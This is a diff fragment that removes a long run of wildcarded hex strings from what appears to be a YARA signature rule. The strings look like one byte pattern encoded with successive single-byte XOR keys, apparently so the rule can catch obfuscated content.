-		$s049 = { 31 30 31 30 31 33 ?? ?? 31 33 31 30 31 33 ?? ?? 31 32 31 33 31 35 ?? ?? ?? ?? 31 35 31 33 31 35 ?? ?? ?? ?? 31 34 31 30 31 33 ?? ?? }
-		$s050 = { 32 33 32 33 32 30 ?? ?? 32 30 32 33 32 30 ?? ?? 32 31 32 30 32 36 ?? ?? ?? ?? 32 36 32 30 32 36 ?? ?? ?? ?? 32 37 32 33 32 30 ?? ?? }
-		$s051 = { 33 32 33 32 33 31 ?? ?? 33 31 33 32 33 31 ?? ?? 33 30 33 31 33 37 ?? ?? ?? ?? 33 37 33 31 33 37 ?? ?? ?? ?? 33 36 33 32 33 31 ?? ?? }
-		$s052 = { 34 35 34 35 34 36 ?? ?? 34 36 34 35 34 36 ?? ?? 34 37 34 36 34 30 ?? ?? ?? ?? 34 30 34 36 34 30 ?? ?? ?? ?? 34 31 34 35 34 36 ?? ?? }
-		$s053 = { 35 34 35 34 35 37 ?? ?? 35 37 35 34 35 37 ?? ?? 35 36 35 37 35 31 ?? ?? ?? ?? 35 31 35 37 35 31 ?? ?? ?? ?? 35 30 35 34 35 37 ?? ?? }
-		$s054 = { 36 37 36 37 36 34 ?? ?? 36 34 36 37 36 34 ?? ?? 36 35 36 34 36 32 ?? ?? ?? ?? 36 32 36 34 36 32 ?? ?? ?? ?? 36 33 36 37 36 34 ?? ?? }
-		$s055 = { 37 36 37 36 37 35 ?? ?? 37 35 37 36 37 35 ?? ?? 37 34 37 35 37 33 ?? ?? ?? ?? 37 33 37 35 37 33 ?? ?? ?? ?? 37 32 37 36 37 35 ?? ?? }
-		$s056 = { 38 39 38 39 38 3A ?? ?? 38 3A 38 39 38 3A ?? ?? 38 3B 38 3A 38 3C ?? ?? ?? ?? 38 3C 38 3A 38 3C ?? ?? ?? ?? 38 3D 38 39 38 3A ?? ?? }
-		$s057 = { 39 38 39 38 39 3B ?? ?? 39 3B 39 38 39 3B ?? ?? 39 3A 39 3B 39 3D ?? ?? ?? ?? 39 3D 39 3B 39 3D ?? ?? ?? ?? 39 3C 39 38 39 3B ?? ?? }
-		$s058 = { 3A 3B 3A 3B 3A 38 ?? ?? 3A 38 3A 3B 3A 38 ?? ?? 3A 39 3A 38 3A 3E ?? ?? ?? ?? 3A 3E 3A 38 3A 3E ?? ?? ?? ?? 3A 3F 3A 3B 3A 38 ?? ?? }
-		$s059 = { 3B 3A 3B 3A 3B 39 ?? ?? 3B 39 3B 3A 3B 39 ?? ?? 3B 38 3B 39 3B 3F ?? ?? ?? ?? 3B 3F 3B 39 3B 3F ?? ?? ?? ?? 3B 3E 3B 3A 3B 39 ?? ?? }
-		$s060 = { 3C 3D 3C 3D 3C 3E ?? ?? 3C 3E 3C 3D 3C 3E ?? ?? 3C 3F 3C 3E 3C 38 ?? ?? ?? ?? 3C 38 3C 3E 3C 38 ?? ?? ?? ?? 3C 39 3C 3D 3C 3E ?? ?? }
-		$s061 = { 3D 3C 3D 3C 3D 3F ?? ?? 3D 3F 3D 3C 3D 3F ?? ?? 3D 3E 3D 3F 3D 39 ?? ?? ?? ?? 3D 39 3D 3F 3D 39 ?? ?? ?? ?? 3D 38 3D 3C 3D 3F ?? ?? }
-		$s062 = { 3E 3F 3E 3F 3E 3C ?? ?? 3E 3C 3E 3F 3E 3C ?? ?? 3E 3D 3E 3C 3E 3A ?? ?? ?? ?? 3E 3A 3E 3C 3E 3A ?? ?? ?? ?? 3E 3B 3E 3F 3E 3C ?? ?? }
-		$s063 = { 3F 3E 3F 3E 3F 3D ?? ?? 3F 3D 3F 3E 3F 3D ?? ?? 3F 3C 3F 3D 3F 3B ?? ?? ?? ?? 3F 3B 3F 3D 3F 3B ?? ?? ?? ?? 3F 3A 3F 3E 3F 3D ?? ?? }
-		$s064 = { 40 41 40 41 40 42 ?? ?? 40 42 40 41 40 42 ?? ?? 40 43 40 42 40 44 ?? ?? ?? ?? 40 44 40 42 40 44 ?? ?? ?? ?? 40 45 40 41 40 42 ?? ?? }
-		$s065 = { 41 40 41 40 41 43 ?? ?? 41 43 41 40 41 43 ?? ?? 41 42 41 43 41 45 ?? ?? ?? ?? 41 45 41 43 41 45 ?? ?? ?? ?? 41 44 41 40 41 43 ?? ?? }
-		$s066 = { 42 43 42 43 42 40 ?? ?? 42 40 42 43 42 40 ?? ?? 42 41 42 40 42 46 ?? ?? ?? ?? 42 46 42 40 42 46 ?? ?? ?? ?? 42 47 42 43 42 40 ?? ?? }
-		$s067 = { 43 42 43 42 43 41 ?? ?? 43 41 43 42 43 41 ?? ?? 43 40 43 41 43 47 ?? ?? ?? ?? 43 47 43 41 43 47 ?? ?? ?? ?? 43 46 43 42 43 41 ?? ?? }
-		$s068 = { 44 45 44 45 44 46 ?? ?? 44 46 44 45 44 46 ?? ?? 44 47 44 46 44 40 ?? ?? ?? ?? 44 40 44 46 44 40 ?? ?? ?? ?? 44 41 44 45 44 46 ?? ?? }
-		$s069 = { 45 44 45 44 45 47 ?? ?? 45 47 45 44 45 47 ?? ?? 45 46 45 47 45 41 ?? ?? ?? ?? 45 41 45 47 45 41 ?? ?? ?? ?? 45 40 45 44 45 47 ?? ?? }
-		$s070 = { 46 47 46 47 46 44 ?? ?? 46 44 46 47 46 44 ?? ?? 46 45 46 44 46 42 ?? ?? ?? ?? 46 42 46 44 46 42 ?? ?? ?? ?? 46 43 46 47 46 44 ?? ?? }
-		$s071 = { 47 46 47 46 47 45 ?? ?? 47 45 47 46 47 45 ?? ?? 47 44 47 45 47 43 ?? ?? ?? ?? 47 43 47 45 47 43 ?? ?? ?? ?? 47 42 47 46 47 45 ?? ?? }
-		$s072 = { 48 49 48 49 48 4A ?? ?? 48 4A 48 49 48 4A ?? ?? 48 4B 48 4A 48 4C ?? ?? ?? ?? 48 4C 48 4A 48 4C ?? ?? ?? ?? 48 4D 48 49 48 4A ?? ?? }
-		$s073 = { 49 48 49 48 49 4B ?? ?? 49 4B 49 48 49 4B ?? ?? 49 4A 49 4B 49 4D ?? ?? ?? ?? 49 4D 49 4B 49 4D ?? ?? ?? ?? 49 4C 49 48 49 4B ?? ?? }
-		$s074 = { 4A 4B 4A 4B 4A 48 ?? ?? 4A 48 4A 4B 4A 48 ?? ?? 4A 49 4A 48 4A 4E ?? ?? ?? ?? 4A 4E 4A 48 4A 4E ?? ?? ?? ?? 4A 4F 4A 4B 4A 48 ?? ?? }
-		$s075 = { 4B 4A 4B 4A 4B 49 ?? ?? 4B 49 4B 4A 4B 49 ?? ?? 4B 48 4B 49 4B 4F ?? ?? ?? ?? 4B 4F 4B 49 4B 4F ?? ?? ?? ?? 4B 4E 4B 4A 4B 49 ?? ?? }
-		$s076 = { 4C 4D 4C 4D 4C 4E ?? ?? 4C 4E 4C 4D 4C 4E ?? ?? 4C 4F 4C 4E 4C 48 ?? ?? ?? ?? 4C 48 4C 4E 4C 48 ?? ?? ?? ?? 4C 49 4C 4D 4C 4E ?? ?? }
-		$s077 = { 4D 4C 4D 4C 4D 4F ?? ?? 4D 4F 4D 4C 4D 4F ?? ?? 4D 4E 4D 4F 4D 49 ?? ?? ?? ?? 4D 49 4D 4F 4D 49 ?? ?? ?? ?? 4D 48 4D 4C 4D 4F ?? ?? }
-		$s078 = { 4E 4F 4E 4F 4E 4C ?? ?? 4E 4C 4E 4F 4E 4C ?? ?? 4E 4D 4E 4C 4E 4A ?? ?? ?? ?? 4E 4A 4E 4C 4E 4A ?? ?? ?? ?? 4E 4B 4E 4F 4E 4C ?? ?? }
-		$s079 = { 4F 4E 4F 4E 4F 4D ?? ?? 4F 4D 4F 4E 4F 4D ?? ?? 4F 4C 4F 4D 4F 4B ?? ?? ?? ?? 4F 4B 4F 4D 4F 4B ?? ?? ?? ?? 4F 4A 4F 4E 4F 4D ?? ?? }
-		$s080 = { 50 51 50 51 50 52 ?? ?? 50 52 50 51 50 52 ?? ?? 50 53 50 52 50 54 ?? ?? ?? ?? 50 54 50 52 50 54 ?? ?? ?? ?? 50 55 50 51 50 52 ?? ?? }
-		$s081 = { 51 50 51 50 51 53 ?? ?? 51 53 51 50 51 53 ?? ?? 51 52 51 53 51 55 ?? ?? ?? ?? 51 55 51 53 51 55 ?? ?? ?? ?? 51 54 51 50 51 53 ?? ?? }
-		$s082 = { 52 53 52 53 52 50 ?? ?? 52 50 52 53 52 50 ?? ?? 52 51 52 50 52 56 ?? ?? ?? ?? 52 56 52 50 52 56 ?? ?? ?? ?? 52 57 52 53 52 50 ?? ?? }
-		$s083 = { 53 52 53 52 53 51 ?? ?? 53 51 53 52 53 51 ?? ?? 53 50 53 51 53 57 ?? ?? ?? ?? 53 57 53 51 53 57 ?? ?? ?? ?? 53 56 53 52 53 51 ?? ?? }
-		$s084 = { 54 55 54 55 54 56 ?? ?? 54 56 54 55 54 56 ?? ?? 54 57 54 56 54 50 ?? ?? ?? ?? 54 50 54 56 54 50 ?? ?? ?? ?? 54 51 54 55 54 56 ?? ?? }
-		$s085 = { 55 54 55 54 55 57 ?? ?? 55 57 55 54 55 57 ?? ?? 55 56 55 57 55 51 ?? ?? ?? ?? 55 51 55 57 55 51 ?? ?? ?? ?? 55 50 55 54 55 57 ?? ?? }
-		$s086 = { 56 57 56 57 56 54 ?? ?? 56 54 56 57 56 54 ?? ?? 56 55 56 54 56 52 ?? ?? ?? ?? 56 52 56 54 56 52 ?? ?? ?? ?? 56 53 56 57 56 54 ?? ?? }
-		$s087 = { 57 56 57 56 57 55 ?? ?? 57 55 57 56 57 55 ?? ?? 57 54 57 55 57 53 ?? ?? ?? ?? 57 53 57 55 57 53 ?? ?? ?? ?? 57 52 57 56 57 55 ?? ?? }
-		$s088 = { 58 59 58 59 58 5A ?? ?? 58 5A 58 59 58 5A ?? ?? 58 5B 58 5A 58 5C ?? ?? ?? ?? 58 5C 58 5A 58 5C ?? ?? ?? ?? 58 5D 58 59 58 5A ?? ?? }
-		$s089 = { 59 58 59 58 59 5B ?? ?? 59 5B 59 58 59 5B ?? ?? 59 5A 59 5B 59 5D ?? ?? ?? ?? 59 5D 59 5B 59 5D ?? ?? ?? ?? 59 5C 59 58 59 5B ?? ?? }
-		$s090 = { 5A 5B 5A 5B 5A 58 ?? ?? 5A 58 5A 5B 5A 58 ?? ?? 5A 59 5A 58 5A 5E ?? ?? ?? ?? 5A 5E 5A 58 5A 5E ?? ?? ?? ?? 5A 5F 5A 5B 5A 58 ?? ?? }
-		$s091 = { 5B 5A 5B 5A 5B 59 ?? ?? 5B 59 5B 5A 5B 59 ?? ?? 5B 58 5B 59 5B 5F ?? ?? ?? ?? 5B 5F 5B 59 5B 5F ?? ?? ?? ?? 5B 5E 5B 5A 5B 59 ?? ?? }
-		$s092 = { 5C 5D 5C 5D 5C 5E ?? ?? 5C 5E 5C 5D 5C 5E ?? ?? 5C 5F 5C 5E 5C 58 ?? ?? ?? ?? 5C 58 5C 5E 5C 58 ?? ?? ?? ?? 5C 59 5C 5D 5C 5E ?? ?? }
-		$s093 = { 5D 5C 5D 5C 5D 5F ?? ?? 5D 5F 5D 5C 5D 5F ?? ?? 5D 5E 5D 5F 5D 59 ?? ?? ?? ?? 5D 59 5D 5F 5D 59 ?? ?? ?? ?? 5D 58 5D 5C 5D 5F ?? ?? }
-		$s094 = { 5E 5F 5E 5F 5E 5C ?? ?? 5E 5C 5E 5F 5E 5C ?? ?? 5E 5D 5E 5C 5E 5A ?? ?? ?? ?? 5E 5A 5E 5C 5E 5A ?? ?? ?? ?? 5E 5B 5E 5F 5E 5C ?? ?? }
-		$s095 = { 5F 5E 5F 5E 5F 5D ?? ?? 5F 5D 5F 5E 5F 5D ?? ?? 5F 5C 5F 5D 5F 5B ?? ?? ?? ?? 5F 5B 5F 5D 5F 5B ?? ?? ?? ?? 5F 5A 5F 5E 5F 5D ?? ?? }
-		$s096 = { 60 61 60 61 60 62 ?? ?? 60 62 60 61 60 62 ?? ?? 60 63 60 62 60 64 ?? ?? ?? ?? 60 64 60 62 60 64 ?? ?? ?? ?? 60 65 60 61 60 62 ?? ?? }
-		$s097 = { 61 60 61 60 61 63 ?? ?? 61 63 61 60 61 63 ?? ?? 61 62 61 63 61 65 ?? ?? ?? ?? 61 65 61 63 61 65 ?? ?? ?? ?? 61 64 61 60 61 63 ?? ?? }
-		$s098 = { 62 63 62 63 62 60 ?? ?? 62 60 62 63 62 60 ?? ?? 62 61 62 60 62 66 ?? ?? ?? ?? 62 66 62 60 62 66 ?? ?? ?? ?? 62 67 62 63 62 60 ?? ?? }
-		$s099 = { 63 62 63 62 63 61 ?? ?? 63 61 63 62 63 61 ?? ?? 63 60 63 61 63 67 ?? ?? ?? ?? 63 67 63 61 63 67 ?? ?? ?? ?? 63 66 63 62 63 61 ?? ?? }
-		$s100 = { 64 65 64 65 64 66 ?? ?? 64 66 64 65 64 66 ?? ?? 64 67 64 66 64 60 ?? ?? ?? ?? 64 60 64 66 64 60 ?? ?? ?? ?? 64 61 64 65 64 66 ?? ?? }
-		$s101 = { 65 64 65 64 65 67 ?? ?? 65 67 65 64 65 67 ?? ?? 65 66 65 67 65 61 ?? ?? ?? ?? 65 61 65 67 65 61 ?? ?? ?? ?? 65 60 65 64 65 67 ?? ?? }
-		$s102 = { 66 67 66 67 66 64 ?? ?? 66 64 66 67 66 64 ?? ?? 66 65 66 64 66 62 ?? ?? ?? ?? 66 62 66 64 66 62 ?? ?? ?? ?? 66 63 66 67 66 64 ?? ?? }
-		$s103 = { 67 66 67 66 67 65 ?? ?? 67 65 67 66 67 65 ?? ?? 67 64 67 65 67 63 ?? ?? ?? ?? 67 63 67 65 67 63 ?? ?? ?? ?? 67 62 67 66 67 65 ?? ?? }
-		$s104 = { 68 69 68 69 68 6A ?? ?? 68 6A 68 69 68 6A ?? ?? 68 6B 68 6A 68 6C ?? ?? ?? ?? 68 6C 68 6A 68 6C ?? ?? ?? ?? 68 6D 68 69 68 6A ?? ?? }
-		$s105 = { 69 68 69 68 69 6B ?? ?? 69 6B 69 68 69 6B ?? ?? 69 6A 69 6B 69 6D ?? ?? ?? ?? 69 6D 69 6B 69 6D ?? ?? ?? ?? 69 6C 69 68 69 6B ?? ?? }
-		$s106 = { 6A 6B 6A 6B 6A 68 ?? ?? 6A 68 6A 6B 6A 68 ?? ?? 6A 69 6A 68 6A 6E ?? ?? ?? ?? 6A 6E 6A 68 6A 6E ?? ?? ?? ?? 6A 6F 6A 6B 6A 68 ?? ?? }
-		$s107 = { 6B 6A 6B 6A 6B 69 ?? ?? 6B 69 6B 6A 6B 69 ?? ?? 6B 68 6B 69 6B 6F ?? ?? ?? ?? 6B 6F 6B 69 6B 6F ?? ?? ?? ?? 6B 6E 6B 6A 6B 69 ?? ?? }
-		$s108 = { 6C 6D 6C 6D 6C 6E ?? ?? 6C 6E 6C 6D 6C 6E ?? ?? 6C 6F 6C 6E 6C 68 ?? ?? ?? ?? 6C 68 6C 6E 6C 68 ?? ?? ?? ?? 6C 69 6C 6D 6C 6E ?? ?? }
-		$s109 = { 6D 6C 6D 6C 6D 6F ?? ?? 6D 6F 6D 6C 6D 6F ?? ?? 6D 6E 6D 6F 6D 69 ?? ?? ?? ?? 6D 69 6D 6F 6D 69 ?? ?? ?? ?? 6D 68 6D 6C 6D 6F ?? ?? }
-		$s110 = { 6E 6F 6E 6F 6E 6C ?? ?? 6E 6C 6E 6F 6E 6C ?? ?? 6E 6D 6E 6C 6E 6A ?? ?? ?? ?? 6E 6A 6E 6C 6E 6A ?? ?? ?? ?? 6E 6B 6E 6F 6E 6C ?? ?? }
-		$s111 = { 6F 6E 6F 6E 6F 6D ?? ?? 6F 6D 6F 6E 6F 6D ?? ?? 6F 6C 6F 6D 6F 6B ?? ?? ?? ?? 6F 6B 6F 6D 6F 6B ?? ?? ?? ?? 6F 6A 6F 6E 6F 6D ?? ?? }
-		$s112 = { 70 71 70 71 70 72 ?? ?? 70 72 70 71 70 72 ?? ?? 70 73 70 72 70 74 ?? ?? ?? ?? 70 74 70 72 70 74 ?? ?? ?? ?? 70 75 70 71 70 72 ?? ?? }
-		$s113 = { 71 70 71 70 71 73 ?? ?? 71 73 71 70 71 73 ?? ?? 71 72 71 73 71 75 ?? ?? ?? ?? 71 75 71 73 71 75 ?? ?? ?? ?? 71 74 71 70 71 73 ?? ?? }
-		$s114 = { 72 73 72 73 72 70 ?? ?? 72 70 72 73 72 70 ?? ?? 72 71 72 70 72 76 ?? ?? ?? ?? 72 76 72 70 72 76 ?? ?? ?? ?? 72 77 72 73 72 70 ?? ?? }
-		$s115 = { 73 72 73 72 73 71 ?? ?? 73 71 73 72 73 71 ?? ?? 73 70 73 71 73 77 ?? ?? ?? ?? 73 77 73 71 73 77 ?? ?? ?? ?? 73 76 73 72 73 71 ?? ?? }
-		$s116 = { 74 75 74 75 74 76 ?? ?? 74 76 74 75 74 76 ?? ?? 74 77 74 76 74 70 ?? ?? ?? ?? 74 70 74 76 74 70 ?? ?? ?? ?? 74 71 74 75 74 76 ?? ?? }
-		$s117 = { 75 74 75 74 75 77 ?? ?? 75 77 75 74 75 77 ?? ?? 75 76 75 77 75 71 ?? ?? ?? ?? 75 71 75 77 75 71 ?? ?? ?? ?? 75 70 75 74 75 77 ?? ?? }
-		$s118 = { 76 77 76 77 76 74 ?? ?? 76 74 76 77 76 74 ?? ?? 76 75 76 74 76 72 ?? ?? ?? ?? 76 72 76 74 76 72 ?? ?? ?? ?? 76 73 76 77 76 74 ?? ?? }
-		$s119 = { 77 76 77 76 77 75 ?? ?? 77 75 77 76 77 75 ?? ?? 77 74 77 75 77 73 ?? ?? ?? ?? 77 73 77 75 77 73 ?? ?? ?? ?? 77 72 77 76 77 75 ?? ?? }
-		$s120 = { 78 79 78 79 78 7A ?? ?? 78 7A 78 79 78 7A ?? ?? 78 7B 78 7A 78 7C ?? ?? ?? ?? 78 7C 78 7A 78 7C ?? ?? ?? ?? 78 7D 78 79 78 7A ?? ?? }
-		$s121 = { 79 78 79 78 79 7B ?? ?? 79 7B 79 78 79 7B ?? ?? 79 7A 79 7B 79 7D ?? ?? ?? ?? 79 7D 79 7B 79 7D ?? ?? ?? ?? 79 7C 79 78 79 7B ?? ?? }
-		$s122 = { 7A 7B 7A 7B 7A 78 ?? ?? 7A 78 7A 7B 7A 78 ?? ?? 7A 79 7A 78 7A 7E ?? ?? ?? ?? 7A 7E 7A 78 7A 7E ?? ?? ?? ?? 7A 7F 7A 7B 7A 78 ?? ?? }
-		$s123 = { 7B 7A 7B 7A 7B 79 ?? ?? 7B 79 7B 7A 7B 79 ?? ?? 7B 78 7B 79 7B 7F ?? ?? ?? ?? 7B 7F 7B 79 7B 7F ?? ?? ?? ?? 7B 7E 7B 7A 7B 79 ?? ?? }
-		$s124 = { 7C 7D 7C 7D 7C 7E ?? ?? 7C 7E 7C 7D 7C 7E ?? ?? 7C 7F 7C 7E 7C 78 ?? ?? ?? ?? 7C 78 7C 7E 7C 78 ?? ?? ?? ?? 7C 79 7C 7D 7C 7E ?? ?? }
-		$s125 = { 7D 7C 7D 7C 7D 7F ?? ?? 7D 7F 7D 7C 7D 7F ?? ?? 7D 7E 7D 7F 7D 79 ?? ?? ?? ?? 7D 79 7D 7F 7D 79 ?? ?? ?? ?? 7D 78 7D 7C 7D 7F ?? ?? }
-		$s126 = { 7E 7F 7E 7F 7E 7C ?? ?? 7E 7C 7E 7F 7E 7C ?? ?? 7E 7D 7E 7C 7E 7A ?? ?? ?? ?? 7E 7A 7E 7C 7E 7A ?? ?? ?? ?? 7E 7B 7E 7F 7E 7C ?? ?? }
-		$s127 = { 7F 7E 7F 7E 7F 7D ?? ?? 7F 7D 7F 7E 7F 7D ?? ?? 7F 7C 7F 7D 7F 7B ?? ?? ?? ?? 7F 7B 7F 7D 7F 7B ?? ?? ?? ?? 7F 7A 7F 7E 7F 7D ?? ?? }
-		$s128 = { 80 81 80 81 80 82 ?? ?? 80 82 80 81 80 82 ?? ?? 80 83 80 82 80 84 ?? ?? ?? ?? 80 84 80 82 80 84 ?? ?? ?? ?? 80 85 80 81 80 82 ?? ?? }
-		$s129 = { 81 80 81 80 81 83 ?? ?? 81 83 81 80 81 83 ?? ?? 81 82 81 83 81 85 ?? ?? ?? ?? 81 85 81 83 81 85 ?? ?? ?? ?? 81 84 81 80 81 83 ?? ?? }
-		$s130 = { 82 83 82 83 82 80 ?? ?? 82 80 82 83 82 80 ?? ?? 82 81 82 80 82 86 ?? ?? ?? ?? 82 86 82 80 82 86 ?? ?? ?? ?? 82 87 82 83 82 80 ?? ?? }
-		$s131 = { 83 82 83 82 83 81 ?? ?? 83 81 83 82 83 81 ?? ?? 83 80 83 81 83 87 ?? ?? ?? ?? 83 87 83 81 83 87 ?? ?? ?? ?? 83 86 83 82 83 81 ?? ?? }
-		$s132 = { 84 85 84 85 84 86 ?? ?? 84 86 84 85 84 86 ?? ?? 84 87 84 86 84 80 ?? ?? ?? ?? 84 80 84 86 84 80 ?? ?? ?? ?? 84 81 84 85 84 86 ?? ?? }
-		$s133 = { 85 84 85 84 85 87 ?? ?? 85 87 85 84 85 87 ?? ?? 85 86 85 87 85 81 ?? ?? ?? ?? 85 81 85 87 85 81 ?? ?? ?? ?? 85 80 85 84 85 87 ?? ?? }
-		$s134 = { 86 87 86 87 86 84 ?? ?? 86 84 86 87 86 84 ?? ?? 86 85 86 84 86 82 ?? ?? ?? ?? 86 82 86 84 86 82 ?? ?? ?? ?? 86 83 86 87 86 84 ?? ?? }
-		$s135 = { 87 86 87 86 87 85 ?? ?? 87 85 87 86 87 85 ?? ?? 87 84 87 85 87 83 ?? ?? ?? ?? 87 83 87 85 87 83 ?? ?? ?? ?? 87 82 87 86 87 85 ?? ?? }
-		$s136 = { 88 89 88 89 88 8A ?? ?? 88 8A 88 89 88 8A ?? ?? 88 8B 88 8A 88 8C ?? ?? ?? ?? 88 8C 88 8A 88 8C ?? ?? ?? ?? 88 8D 88 89 88 8A ?? ?? }
-		$s137 = { 89 88 89 88 89 8B ?? ?? 89 8B 89 88 89 8B ?? ?? 89 8A 89 8B 89 8D ?? ?? ?? ?? 89 8D 89 8B 89 8D ?? ?? ?? ?? 89 8C 89 88 89 8B ?? ?? }
-		$s138 = { 8A 8B 8A 8B 8A 88 ?? ?? 8A 88 8A 8B 8A 88 ?? ?? 8A 89 8A 88 8A 8E ?? ?? ?? ?? 8A 8E 8A 88 8A 8E ?? ?? ?? ?? 8A 8F 8A 8B 8A 88 ?? ?? }
-		$s139 = { 8B 8A 8B 8A 8B 89 ?? ?? 8B 89 8B 8A 8B 89 ?? ?? 8B 88 8B 89 8B 8F ?? ?? ?? ?? 8B 8F 8B 89 8B 8F ?? ?? ?? ?? 8B 8E 8B 8A 8B 89 ?? ?? }
-		$s140 = { 8C 8D 8C 8D 8C 8E ?? ?? 8C 8E 8C 8D 8C 8E ?? ?? 8C 8F 8C 8E 8C 88 ?? ?? ?? ?? 8C 88 8C 8E 8C 88 ?? ?? ?? ?? 8C 89 8C 8D 8C 8E ?? ?? }
-		$s141 = { 8D 8C 8D 8C 8D 8F ?? ?? 8D 8F 8D 8C 8D 8F ?? ?? 8D 8E 8D 8F 8D 89 ?? ?? ?? ?? 8D 89 8D 8F 8D 89 ?? ?? ?? ?? 8D 88 8D 8C 8D 8F ?? ?? }
-		$s142 = { 8E 8F 8E 8F 8E 8C ?? ?? 8E 8C 8E 8F 8E 8C ?? ?? 8E 8D 8E 8C 8E 8A ?? ?? ?? ?? 8E 8A 8E 8C 8E 8A ?? ?? ?? ?? 8E 8B 8E 8F 8E 8C ?? ?? }
-		$s143 = { 8F 8E 8F 8E 8F 8D ?? ?? 8F 8D 8F 8E 8F 8D ?? ?? 8F 8C 8F 8D 8F 8B ?? ?? ?? ?? 8F 8B 8F 8D 8F 8B ?? ?? ?? ?? 8F 8A 8F 8E 8F 8D ?? ?? }
-		$s144 = { 90 91 90 91 90 92 ?? ?? 90 92 90 91 90 92 ?? ?? 90 93 90 92 90 94 ?? ?? ?? ?? 90 94 90 92 90 94 ?? ?? ?? ?? 90 95 90 91 90 92 ?? ?? }
-		$s145 = { 91 90 91 90 91 93 ?? ?? 91 93 91 90 91 93 ?? ?? 91 92 91 93 91 95 ?? ?? ?? ?? 91 95 91 93 91 95 ?? ?? ?? ?? 91 94 91 90 91 93 ?? ?? }
-		$s146 = { 92 93 92 93 92 90 ?? ?? 92 90 92 93 92 90 ?? ?? 92 91 92 90 92 96 ?? ?? ?? ?? 92 96 92 90 92 96 ?? ?? ?? ?? 92 97 92 93 92 90 ?? ?? }
-		$s147 = { 93 92 93 92 93 91 ?? ?? 93 91 93 92 93 91 ?? ?? 93 90 93 91 93 97 ?? ?? ?? ?? 93 97 93 91 93 97 ?? ?? ?? ?? 93 96 93 92 93 91 ?? ?? }
-		$s148 = { 94 95 94 95 94 96 ?? ?? 94 96 94 95 94 96 ?? ?? 94 97 94 96 94 90 ?? ?? ?? ?? 94 90 94 96 94 90 ?? ?? ?? ?? 94 91 94 95 94 96 ?? ?? }
-		$s149 = { 95 94 95 94 95 97 ?? ?? 95 97 95 94 95 97 ?? ?? 95 96 95 97 95 91 ?? ?? ?? ?? 95 91 95 97 95 91 ?? ?? ?? ?? 95 90 95 94 95 97 ?? ?? }
-		$s150 = { 96 97 96 97 96 94 ?? ?? 96 94 96 97 96 94 ?? ?? 96 95 96 94 96 92 ?? ?? ?? ?? 96 92 96 94 96 92 ?? ?? ?? ?? 96 93 96 97 96 94 ?? ?? }
-		$s151 = { 97 96 97 96 97 95 ?? ?? 97 95 97 96 97 95 ?? ?? 97 94 97 95 97 93 ?? ?? ?? ?? 97 93 97 95 97 93 ?? ?? ?? ?? 97 92 97 96 97 95 ?? ?? }
-		$s152 = { 98 99 98 99 98 9A ?? ?? 98 9A 98 99 98 9A ?? ?? 98 9B 98 9A 98 9C ?? ?? ?? ?? 98 9C 98 9A 98 9C ?? ?? ?? ?? 98 9D 98 99 98 9A ?? ?? }
-		$s153 = { 99 98 99 98 99 9B ?? ?? 99 9B 99 98 99 9B ?? ?? 99 9A 99 9B 99 9D ?? ?? ?? ?? 99 9D 99 9B 99 9D ?? ?? ?? ?? 99 9C 99 98 99 9B ?? ?? }
-		$s154 = { 9A 9B 9A 9B 9A 98 ?? ?? 9A 98 9A 9B 9A 98 ?? ?? 9A 99 9A 98 9A 9E ?? ?? ?? ?? 9A 9E 9A 98 9A 9E ?? ?? ?? ?? 9A 9F 9A 9B 9A 98 ?? ?? }
-		$s155 = { 9B 9A 9B 9A 9B 99 ?? ?? 9B 99 9B 9A 9B 99 ?? ?? 9B 98 9B 99 9B 9F ?? ?? ?? ?? 9B 9F 9B 99 9B 9F ?? ?? ?? ?? 9B 9E 9B 9A 9B 99 ?? ?? }
-		$s156 = { 9C 9D 9C 9D 9C 9E ?? ?? 9C 9E 9C 9D 9C 9E ?? ?? 9C 9F 9C 9E 9C 98 ?? ?? ?? ?? 9C 98 9C 9E 9C 98 ?? ?? ?? ?? 9C 99 9C 9D 9C 9E ?? ?? }
-		$s157 = { 9D 9C 9D 9C 9D 9F ?? ?? 9D 9F 9D 9C 9D 9F ?? ?? 9D 9E 9D 9F 9D 99 ?? ?? ?? ?? 9D 99 9D 9F 9D 99 ?? ?? ?? ?? 9D 98 9D 9C 9D 9F ?? ?? }
-		$s158 = { 9E 9F 9E 9F 9E 9C ?? ?? 9E 9C 9E 9F 9E 9C ?? ?? 9E 9D 9E 9C 9E 9A ?? ?? ?? ?? 9E 9A 9E 9C 9E 9A ?? ?? ?? ?? 9E 9B 9E 9F 9E 9C ?? ?? }
-		$s159 = { 9F 9E 9F 9E 9F 9D ?? ?? 9F 9D 9F 9E 9F 9D ?? ?? 9F 9C 9F 9D 9F 9B ?? ?? ?? ?? 9F 9B 9F 9D 9F 9B ?? ?? ?? ?? 9F 9A 9F 9E 9F 9D ?? ?? }
-		$s160 = { A0 A1 A0 A1 A0 A2 ?? ?? A0 A2 A0 A1 A0 A2 ?? ?? A0 A3 A0 A2 A0 A4 ?? ?? ?? ?? A0 A4 A0 A2 A0 A4 ?? ?? ?? ?? A0 A5 A0 A1 A0 A2 ?? ?? }
-		$s161 = { A1 A0 A1 A0 A1 A3 ?? ?? A1 A3 A1 A0 A1 A3 ?? ?? A1 A2 A1 A3 A1 A5 ?? ?? ?? ?? A1 A5 A1 A3 A1 A5 ?? ?? ?? ?? A1 A4 A1 A0 A1 A3 ?? ?? }
-		$s162 = { A2 A3 A2 A3 A2 A0 ?? ?? A2 A0 A2 A3 A2 A0 ?? ?? A2 A1 A2 A0 A2 A6 ?? ?? ?? ?? A2 A6 A2 A0 A2 A6 ?? ?? ?? ?? A2 A7 A2 A3 A2 A0 ?? ?? }
-		$s163 = { A3 A2 A3 A2 A3 A1 ?? ?? A3 A1 A3 A2 A3 A1 ?? ?? A3 A0 A3 A1 A3 A7 ?? ?? ?? ?? A3 A7 A3 A1 A3 A7 ?? ?? ?? ?? A3 A6 A3 A2 A3 A1 ?? ?? }
-		$s164 = { A4 A5 A4 A5 A4 A6 ?? ?? A4 A6 A4 A5 A4 A6 ?? ?? A4 A7 A4 A6 A4 A0 ?? ?? ?? ?? A4 A0 A4 A6 A4 A0 ?? ?? ?? ?? A4 A1 A4 A5 A4 A6 ?? ?? }
-		$s165 = { A5 A4 A5 A4 A5 A7 ?? ?? A5 A7 A5 A4 A5 A7 ?? ?? A5 A6 A5 A7 A5 A1 ?? ?? ?? ?? A5 A1 A5 A7 A5 A1 ?? ?? ?? ?? A5 A0 A5 A4 A5 A7 ?? ?? }
